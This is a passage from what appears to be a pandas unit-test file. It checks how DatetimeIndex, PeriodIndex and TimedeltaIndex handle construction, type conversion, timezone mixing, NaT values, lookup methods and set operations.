self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# different tz results in Index(dtype=object)
result = Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='US/Eastern')],
name='idx')
exp = Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
result = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='US/Eastern')], name='idx')
exp = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
# all NaT
result = Index([pd.NaT, pd.NaT], name='idx')
exp = DatetimeIndex([pd.NaT, pd.NaT], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# all NaT with tz
result = Index([pd.NaT, pd.NaT], tz='Asia/Tokyo', name='idx')
exp = DatetimeIndex([pd.NaT, pd.NaT], tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
def test_construction_dti_with_mixed_timezones(self):
# GH 11488 (not changed, added explicit tests)
# no tz results in DatetimeIndex
result = DatetimeIndex(
[Timestamp('2011-01-01'), Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex(
[Timestamp('2011-01-01'), Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# same tz results in DatetimeIndex
result = DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00',
tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00')],
tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# same tz results in DatetimeIndex (DST)
result = DatetimeIndex([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
Timestamp('2011-08-01 10:00',
tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# different tz coerces tz-naive to tz-awareIndex(dtype=object)
result = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00',
tz='US/Eastern')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 05:00'),
Timestamp('2011-01-02 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# tz mismatch affecting to tz-aware raises TypeError/ValueError
with tm.assertRaises(ValueError):
DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
with tm.assertRaisesRegexp(TypeError, 'data is already tz-aware'):
DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='Asia/Tokyo', name='idx')
with tm.assertRaises(ValueError):
DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='US/Eastern', name='idx')
with tm.assertRaisesRegexp(TypeError, 'data is already tz-aware'):
# passing tz should results in DatetimeIndex, then mismatch raises
# TypeError
Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='Asia/Tokyo', name='idx')
def test_construction_base_constructor(self):
arr = [pd.Timestamp('2011-01-01'), pd.NaT, pd.Timestamp('2011-01-03')]
tm.assert_index_equal(pd.Index(arr), pd.DatetimeIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.DatetimeIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Timestamp('2011-01-03')]
tm.assert_index_equal(pd.Index(arr), pd.DatetimeIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.DatetimeIndex(np.array(arr)))
def test_construction_outofbounds(self):
# GH 13663
dates = [datetime(3000, 1, 1), datetime(4000, 1, 1),
datetime(5000, 1, 1), datetime(6000, 1, 1)]
exp = Index(dates, dtype=object)
# coerces to object
tm.assert_index_equal(Index(dates), exp)
with tm.assertRaises(OutOfBoundsDatetime):
# can't create DatetimeIndex
DatetimeIndex(dates)
def test_construction_with_ndarray(self):
# GH 5152
dates = [datetime(2013, 10, 7),
datetime(2013, 10, 8),
datetime(2013, 10, 9)]
data = DatetimeIndex(dates, freq=pd.tseries.frequencies.BDay()).values
result = DatetimeIndex(data, freq=pd.tseries.frequencies.BDay())
expected = DatetimeIndex(['2013-10-07',
'2013-10-08',
'2013-10-09'],
freq='B')
tm.assert_index_equal(result, expected)
def test_astype(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype(object)
expected = Index([Timestamp('2016-05-16')] + [NaT] * 3, dtype=object)
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([1463356800000000000] +
[-9223372036854775808] * 3, dtype=np.int64)
tm.assert_index_equal(result, expected)
rng = date_range('1/1/2000', periods=10)
result = rng.astype('i8')
self.assert_index_equal(result, Index(rng.asi8))
self.assert_numpy_array_equal(result.values, rng.asi8)
def test_astype_with_tz(self):
# with tz
rng = date_range('1/1/2000', periods=10, tz='US/Eastern')
result = rng.astype('datetime64[ns]')
expected = (date_range('1/1/2000', periods=10,
tz='US/Eastern')
.tz_convert('UTC').tz_localize(None))
tm.assert_index_equal(result, expected)
# BUG#10442 : testing astype(str) is correct for Series/DatetimeIndex
result = pd.Series(pd.date_range('2012-01-01', periods=3)).astype(str)
expected = pd.Series(
['2012-01-01', '2012-01-02', '2012-01-03'], dtype=object)
tm.assert_series_equal(result, expected)
result = Series(pd.date_range('2012-01-01', periods=3,
tz='US/Eastern')).astype(str)
expected = Series(['2012-01-01 00:00:00-05:00',
'2012-01-02 00:00:00-05:00',
'2012-01-03 00:00:00-05:00'],
dtype=object)
tm.assert_series_equal(result, expected)
def test_astype_str_compat(self):
# GH 13149, GH 13209
# verify that we are returing NaT as a string (and not unicode)
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype(str)
expected = Index(['2016-05-16', 'NaT', 'NaT', 'NaT'], dtype=object)
tm.assert_index_equal(result, expected)
def test_astype_str(self):
# test astype string - #10442
result = date_range('2012-01-01', periods=4,
name='test_name').astype(str)
expected = Index(['2012-01-01', '2012-01-02', '2012-01-03',
'2012-01-04'], name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with tz and name
result = date_range('2012-01-01', periods=3, name='test_name',
tz='US/Eastern').astype(str)
expected = Index(['2012-01-01 00:00:00-05:00',
'2012-01-02 00:00:00-05:00',
'2012-01-03 00:00:00-05:00'],
name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with freqH and name
result = date_range('1/1/2011', periods=3, freq='H',
name='test_name').astype(str)
expected = Index(['2011-01-01 00:00:00', '2011-01-01 01:00:00',
'2011-01-01 02:00:00'],
name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with freqH and timezone
result = date_range('3/6/2012 00:00', periods=2, freq='H',
tz='Europe/London', name='test_name').astype(str)
expected = Index(['2012-03-06 00:00:00+00:00',
'2012-03-06 01:00:00+00:00'],
dtype=object, name='test_name')
tm.assert_index_equal(result, expected)
def test_astype_datetime64(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype('datetime64[ns]')
tm.assert_index_equal(result, idx)
self.assertFalse(result is idx)
result = idx.astype('datetime64[ns]', copy=False)
tm.assert_index_equal(result, idx)
self.assertTrue(result is idx)
idx_tz = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN], tz='EST')
result = idx_tz.astype('datetime64[ns]')
expected = DatetimeIndex(['2016-05-16 05:00:00', 'NaT', 'NaT', 'NaT'],
dtype='datetime64[ns]')
tm.assert_index_equal(result, expected)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, 'timedelta64')
self.assertRaises(ValueError, idx.astype, 'timedelta64[ns]')
self.assertRaises(ValueError, idx.astype, 'datetime64')
self.assertRaises(ValueError, idx.astype, 'datetime64[D]')
def test_where_other(self):
# other is ndarray or Index
i = pd.date_range('20130101', periods=3, tz='US/Eastern')
for arr in [np.nan, pd.NaT]:
result = i.where(notnull(i), other=np.nan)
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2), i2)
tm.assert_index_equal(result, i2)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2), i2.values)
tm.assert_index_equal(result, i2)
def test_where_tz(self):
i = pd.date_range('20130101', periods=3, tz='US/Eastern')
result = i.where(notnull(i))
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2))
expected = i2
tm.assert_index_equal(result, expected)
def test_get_loc(self):
idx = pd.date_range('2000-01-01', periods=3)
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(idx.get_loc(idx[1].to_pydatetime(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
if method is not None:
self.assertEqual(idx.get_loc(idx[1], method,
tolerance=pd.Timedelta('0 days')),
1)
self.assertEqual(idx.get_loc('2000-01-01', method='nearest'), 0)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest'), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance='1 day'), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=pd.Timedelta('1D')), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=np.timedelta64(1, 'D')), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=timedelta(1)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc('2000-01-01T12', method='nearest', tolerance='foo')
with tm.assertRaises(KeyError):
idx.get_loc('2000-01-01T03', method='nearest', tolerance='2 hours')
self.assertEqual(idx.get_loc('2000', method='nearest'), slice(0, 3))
self.assertEqual(idx.get_loc('2000-01', method='nearest'), slice(0, 3))
self.assertEqual(idx.get_loc('1999', method='nearest'), 0)
self.assertEqual(idx.get_loc('2001', method='nearest'), 2)
with tm.assertRaises(KeyError):
idx.get_loc('1999', method='pad')
with tm.assertRaises(KeyError):
idx.get_loc('2001', method='backfill')
with tm.assertRaises(KeyError):
idx.get_loc('foobar')
with tm.assertRaises(TypeError):
idx.get_loc(slice(2))
idx = pd.to_datetime(['2000-01-01', '2000-01-04'])
self.assertEqual(idx.get_loc('2000-01-02', method='nearest'), 0)
self.assertEqual(idx.get_loc('2000-01-03', method='nearest'), 1)
self.assertEqual(idx.get_loc('2000-01', method='nearest'), slice(0, 2))
# time indexing
idx = pd.date_range('2000-01-01', periods=24, freq='H')
tm.assert_numpy_array_equal(idx.get_loc(time(12)),
np.array([12]), check_dtype=False)
tm.assert_numpy_array_equal(idx.get_loc(time(12, 30)),
np.array([]), check_dtype=False)
with tm.assertRaises(NotImplementedError):
idx.get_loc(time(12, 30), method='pad')
def test_get_indexer(self):
idx = pd.date_range('2000-01-01', periods=3)
exp = np.array([0, 1, 2], dtype=np.intp)
tm.assert_numpy_array_equal(idx.get_indexer(idx), exp)
target = idx[0] + pd.to_timedelta(['-1 hour', '12 hours',
'1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
tm.assert_numpy_array_equal(
idx.get_indexer(target, 'nearest',
tolerance=pd.Timedelta('1 hour')),
np.array([0, -1, 1], dtype=np.intp))
with tm.assertRaises(ValueError):
idx.get_indexer(idx[[0]], method='nearest', tolerance='foo')
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range('20130101', periods=3, tz='US/Eastern', name='foo')
unpickled = self.round_trip_pickle(index)
self.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range('20130101', periods=3, tz='US/Eastern')
self.assertEqual(str(index.reindex([])[0].tz), 'US/Eastern')
self.assertEqual(str(index.reindex(np.array([]))[0].tz), 'US/Eastern')
def test_time_loc(self): # GH8667
from datetime import time
from pandas.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range('2014-11-26', periods=n, freq='S')
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i,
check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start='2000', periods=periods, freq='S')
self.assertEqual(len(idx1), periods)
idx2 = pd.date_range(end='2000', periods=periods, freq='S')
self.assertEqual(len(idx2), periods)
def test_intersection(self):
first = self.index
second = self.index[5:]
intersect = first.intersection(second)
self.assertTrue(tm.equalContents(intersect, second))
# GH 10149
cases = [klass(second.values) for klass in [np.array, Series, list]]
for case in cases:
result = first.intersection(case)
self.assertTrue(tm.equalContents(result, second))
third = Index(['a', 'b', 'c'])
result = first.intersection(third)
expected = pd.Index([], dtype=object)
self.assert_index_equal(result, expected)
def test_union(self):
first = self.index[:5]
second = self.index[5:]
everything = self.index
union = first.union(second)
self.assertTrue(tm.equalContents(union, everything))
# GH 10149
cases = [klass(second.values) for klass in [np.array, Series, list]]
for case in cases:
result = first.union(case)
self.assertTrue(tm.equalContents(result, everything))
def test_nat(self):
self.assertIs(DatetimeIndex([np.nan])[0], pd.NaT)
def test_ufunc_coercions(self):
idx = date_range('2011-01-01', periods=3, freq='2D', name='x')
delta = np.timedelta64(1, 'D')
for result in [idx + delta, np.add(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = date_range('2011-01-02', periods=3, freq='2D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '2D')
for result in [idx - delta, np.subtract(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = date_range('2010-12-31', periods=3, freq='2D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '2D')
delta = np.array([np.timedelta64(1, 'D'), np.timedelta64(2, 'D'),
np.timedelta64(3, 'D')])
for result in [idx + delta, np.add(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = DatetimeIndex(['2011-01-02', '2011-01-05', '2011-01-08'],
freq='3D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '3D')
for result in [idx - delta, np.subtract(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = DatetimeIndex(['2010-12-31', '2011-01-01', '2011-01-02'],
freq='D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, 'D')
def test_fillna_datetime64(self):
# GH 11343
for tz in ['US/Eastern', 'Asia/Tokyo']:
idx = pd.DatetimeIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'])
exp = pd.DatetimeIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'])
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00')), exp)
# tz mismatch
exp = pd.Index([pd.Timestamp('2011-01-01 09:00'),
pd.Timestamp('2011-01-01 10:00', tz=tz),
pd.Timestamp('2011-01-01 11:00')], dtype=object)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00', tz=tz)), exp)
# object
exp = pd.Index([pd.Timestamp('2011-01-01 09:00'), 'x',
pd.Timestamp('2011-01-01 11:00')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
idx = pd.DatetimeIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'], tz=tz)
exp = pd.DatetimeIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'], tz=tz)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00', tz=tz)), exp)
exp = pd.Index([pd.Timestamp('2011-01-01 09:00', tz=tz),
pd.Timestamp('2011-01-01 10:00'),
pd.Timestamp('2011-01-01 11:00', tz=tz)],
dtype=object)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00')), exp)
# object
exp = pd.Index([pd.Timestamp('2011-01-01 09:00', tz=tz),
'x',
pd.Timestamp('2011-01-01 11:00', tz=tz)],
dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
def test_difference_freq(self):
# GH14323: difference of DatetimeIndex should not preserve frequency
index = date_range("20160920", "20160925", freq="D")
other = date_range("20160921", "20160924", freq="D")
expected = DatetimeIndex(["20160920", "20160925"], freq=None)
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = date_range("20160922", "20160925", freq="D")
idx_diff = index.difference(other)
expected = DatetimeIndex(["20160920", "20160921"], freq=None)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq='WOM-1SAT')
dates = ['2013-01-05', '2013-02-02', '2013-03-02', '2013-04-06']
expected = DatetimeIndex(dates, freq='WOM-1SAT')
tm.assert_index_equal(result, expected)
class TestPeriodIndex(DatetimeLike, tm.TestCase):
_holder = PeriodIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makePeriodIndex(10))
self.setup_indices()
def create_index(self):
return period_range('20130101', periods=5, freq='D')
def test_construction_base_constructor(self):
# GH 13664
arr = [pd.Period('2011-01', freq='M'), pd.NaT,
pd.Period('2011-03', freq='M')]
tm.assert_index_equal(pd.Index(arr), pd.PeriodIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.PeriodIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Period('2011-03', freq='M')]
tm.assert_index_equal(pd.Index(arr), pd.PeriodIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.PeriodIndex(np.array(arr)))
arr = [pd.Period('2011-01', freq='M'), pd.NaT,
pd.Period('2011-03', freq='D')]
tm.assert_index_equal(pd.Index(arr), pd.Index(arr, dtype=object))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.Index(np.array(arr), dtype=object))
def test_astype(self):
# GH 13149, GH 13209
idx = PeriodIndex(['2016-05-16', 'NaT', NaT, np.NaN], freq='D')
result = idx.astype(object)
expected = Index([Period('2016-05-16', freq='D')] +
[Period(NaT, freq='D')] * 3, dtype='object')
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([16937] + [-9223372036854775808] * 3,
dtype=np.int64)
tm.assert_index_equal(result, expected)
idx = period_range('1990', '2009', freq='A')
result = idx.astype('i8')
self.assert_index_equal(result, Index(idx.asi8))
self.assert_numpy_array_equal(result.values, idx.asi8)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = PeriodIndex(['2016-05-16', 'NaT', NaT, np.NaN], freq='D')
self.assertRaises(ValueError, idx.astype, str)
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, 'timedelta64')
self.assertRaises(ValueError, idx.astype, 'timedelta64[ns]')
def test_shift(self):
# test shift for PeriodIndex
# GH8083
drange = self.create_index()
result = drange.shift(1)
expected = PeriodIndex(['2013-01-02', '2013-01-03', '2013-01-04',
'2013-01-05', '2013-01-06'], freq='D')
self.assert_index_equal(result, expected)
def test_pickle_compat_construction(self):
pass
def test_get_loc(self):
idx = pd.period_range('2000-01-01', periods=3)
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(
idx.get_loc(idx[1].asfreq('H', how='start'), method), 1)
self.assertEqual(idx.get_loc(idx[1].to_timestamp(), method), 1)
self.assertEqual(
idx.get_loc(idx[1].to_timestamp().to_pydatetime(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
idx = pd.period_range('2000-01-01', periods=5)[::2]
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance='1 day'), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=pd.Timedelta('1D')), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=np.timedelta64(1, 'D')), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=timedelta(1)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc('2000-01-10', method='nearest', tolerance='foo')
msg = 'Input has different freq from PeriodIndex\\(freq=D\\)'
with tm.assertRaisesRegexp(ValueError, msg):
idx.get_loc('2000-01-10', method='nearest', tolerance='1 hour')
with tm.assertRaises(KeyError):
idx.get_loc('2000-01-10', method='nearest', tolerance='1 day')
def test_where(self):
i = self.create_index()
result = i.where(notnull(i))
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2))
expected = i2
tm.assert_index_equal(result, expected)
def test_where_other(self):
i = self.create_index()
for arr in [np.nan, pd.NaT]:
result = i.where(notnull(i), other=np.nan)
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2), i2)
tm.assert_index_equal(result, i2)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2), i2.values)
tm.assert_index_equal(result, i2)
def test_get_indexer(self):
idx = pd.period_range('2000-01-01', periods=3).asfreq('H', how='start')
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.PeriodIndex(['1999-12-31T23', '2000-01-01T12',
'2000-01-02T01'], freq='H')
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest',
tolerance='1 hour'),
np.array([0, -1, 1], dtype=np.intp))
msg = 'Input has different freq from PeriodIndex\\(freq=H\\)'
with self.assertRaisesRegexp(ValueError, msg):
idx.get_indexer(target, 'nearest', tolerance='1 minute')
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest',
tolerance='1 day'),
np.array([0, 1, 1], dtype=np.intp))
def test_repeat(self):
# GH10183
idx = pd.period_range('2000-01-01', periods=3, freq='D')
res = idx.repeat(3)
exp = PeriodIndex(idx.values.repeat(3), freq='D')
self.assert_index_equal(res, exp)
self.assertEqual(res.freqstr, 'D')
def test_period_index_indexer(self):
# GH4125
idx = pd.period_range('2002-01', '2003-12', freq='M')
df = pd.DataFrame(pd.np.random.randn(24, 10), index=idx)
self.assert_frame_equal(df, df.ix[idx])
self.assert_frame_equal(df, df.ix[list(idx)])
self.assert_frame_equal(df, df.loc[list(idx)])
self.assert_frame_equal(df.iloc[0:5], df.loc[idx[0:5]])
self.assert_frame_equal(df, df.loc[list(idx)])
def test_fillna_period(self):
# GH 11343
idx = pd.PeriodIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'], freq='H')
exp = pd.PeriodIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'], freq='H')
self.assert_index_equal(
idx.fillna(pd.Period('2011-01-01 10:00', freq='H')), exp)
exp = pd.Index([pd.Period('2011-01-01 09:00', freq='H'), 'x',
pd.Period('2011-01-01 11:00', freq='H')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
exp = pd.Index([pd.Period('2011-01-01 09:00', freq='H'),
pd.Period('2011-01-01', freq='D'),
pd.Period('2011-01-01 11:00', freq='H')], dtype=object)
self.assert_index_equal(idx.fillna(pd.Period('2011-01-01', freq='D')),
exp)
def test_no_millisecond_field(self):
with self.assertRaises(AttributeError):
DatetimeIndex.millisecond
with self.assertRaises(AttributeError):
DatetimeIndex([]).millisecond
def test_difference_freq(self):
# GH14323: difference of Period MUST preserve frequency
# but the ability to union results must be preserved
index = period_range("20160920", "20160925", freq="D")
other = period_range("20160921", "20160924", freq="D")
expected = PeriodIndex(["20160920", "20160925"], freq='D')
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = period_range("20160922", "20160925", freq="D")
idx_diff = index.difference(other)
expected = PeriodIndex(["20160920", "20160921"], freq='D')
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
class TestTimedeltaIndex(DatetimeLike, tm.TestCase):
_holder = TimedeltaIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makeTimedeltaIndex(10))
self.setup_indices()
def create_index(self):
return pd.to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
def test_construction_base_constructor(self):
arr = [pd.Timedelta('1 days'), pd.NaT, pd.Timedelta('3 days')]
tm.assert_index_equal(pd.Index(arr), pd.TimedeltaIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.TimedeltaIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Timedelta('1 days')]
tm.assert_index_equal(pd.Index(arr), pd.TimedeltaIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.TimedeltaIndex(np.array(arr)))
def test_shift(self):
# test shift for TimedeltaIndex
# err8083
drange = self.create_index()
result = drange.shift(1)
expected = TimedeltaIndex(['1 days 01:00:00', '2 days 01:00:00',
'3 days 01:00:00',
'4 days 01:00:00', '5 days 01:00:00'],
freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(3, freq='2D 1s')
expected = TimedeltaIndex(['6 days 01:00:03', '7 days 01:00:03',
'8 days 01:00:03', '9 days 01:00:03',
'10 days 01:00:03'], freq='D')
self.assert_index_equal(result, expected)
def test_astype(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
result = idx.astype(object)
expected = Index([Timedelta('1 days 03:46:40')] + [pd.NaT] * 3,
dtype=object)
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([100000000000000] + [-9223372036854775808] * 3,
dtype=np.int64)
tm.assert_index_equal(result, expected)
rng = timedelta_range('1 days', periods=10)
result = rng.astype('i8')
self.assert_index_equal(result, Index(rng.asi8))
self.assert_numpy_array_equal(rng.asi8, result.values)
def test_astype_timedelta64(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
result = idx.astype('timedelta64')
expected = Float64Index([1e+14] + [np.NaN] * 3, dtype='float64')
tm.assert_index_equal(result, expected)
result = idx.astype('timedelta64[ns]')
tm.assert_index_equal(result, idx)
self.assertFalse(result is idx)
result = idx.astype('timedelta64[ns]', copy=False)
tm.assert_index_equal(result, idx)
self.assertTrue(result is idx)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = TimedeltaIndex([1e14, 'NaT', pd.NaT, np.NaN])
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, str)
